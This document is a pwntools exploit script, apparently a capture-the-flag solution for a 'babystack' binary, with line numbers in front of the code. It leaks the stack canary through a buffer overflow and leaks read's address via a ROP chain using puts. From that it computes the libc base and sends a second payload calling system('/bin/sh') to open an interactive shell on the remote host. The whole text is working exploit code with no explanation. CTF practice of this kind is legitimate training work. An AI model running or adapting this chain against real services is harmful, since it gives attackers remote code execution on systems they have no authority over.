1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| from pwn import *
context(arch='amd64', os='linux',log_level='debug')
context.terminal = ['tmux','splitw','-h']
cn = remote('10.10.31.156',10006)
elf = ELF('./babystack')
libc = ELF('/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11_amd64/libc6_2.23-0ubuntu11.2_amd64.so')
read_got=elf.got['read']
puts_addr=elf.plt['puts']
main=0x400908
pop_rdi=0x400a93
cn.sendafter('>>','1')
cn.sendline('A'*0x88)
cn.sendafter('>>','2')
recv=cn.recvuntil('A'*0x88)
canary=cn.recv(8)
canary=u64(canary[1:].rjust(8,b'\x00'))
log.info("canary = %#x", canary)
cn.recvuntil('>> ')
payload = b'a'*0x88 + p64(canary) + p64(read_got) +p64(pop_rdi) + p64(read_got) + p64(puts_addr) + p64(main)
cn.sendline('1')
cn.send(payload)
cn.sendafter('>>','3')
read_addr=cn.recvuntil(b'\x0a')
read_addr=read_addr[1:-1]
print(read_addr)
read_addr=u64(read_addr.ljust(8,b'\x00'))
log.info("read_addr = %#x", read_addr)
read_offset= libc.symbols['read']
binsh=next(libc.search(b'/bin/sh'))
system=libc.symbols['system']
base=read_addr-read_offset
system_addr= base+system
binsh=binsh+base
cn.recvuntil('>> ')
cn.sendline('1')
payload=b'A'*0x88+p64(canary) + p64(binsh) + p64(0x40067e) + p64(pop_rdi) + p64(binsh) + p64(system_addr)
print(payload)
cn.send(payload)
cn.recvuntil('>> ')
cn.sendline('3')
cn.interactive()
|